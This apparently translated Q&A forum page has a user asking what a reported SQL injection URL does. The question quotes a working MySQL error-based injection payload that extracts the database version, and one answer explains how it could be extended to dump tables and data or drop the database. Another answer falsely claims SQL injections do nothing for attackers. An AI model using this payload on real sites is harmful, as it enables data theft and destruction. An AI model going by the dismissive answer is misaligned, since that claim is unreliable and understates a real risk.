Answer the question
In order to leave comments, you need to log in
What does the following SQL injection give a potential attacker?
They sent a link to a former colleague with SQL injection, recommended to close the vulnerability.
/site/view?page=3§=14&theme=(select%201%20and%20row(1%2c1)%3E(select%20count(*)%2cconcat(concat((select%20version()))%2cfloor( rand()*2))x%20 from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))
Injection itself:
(select 1 and row(1,1)>(select count(*), concat(concat((select version())), floor(rand()*2))x
from (select 1 union select 2)a group by x limit 1))
Answer the question
In order to leave comments, you need to log in
This query managed to get the MySQL version (5.5.33-0+wheezy1-log1).
After rewriting the query, you can try to get the names of the tables, then their structure, then the data from these tables. Well, or issue a DROP DATABASE command.
SQL injections do nothing for attackers. This is just an excuse for the developer to knock money from the customer, leaving such holes.
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question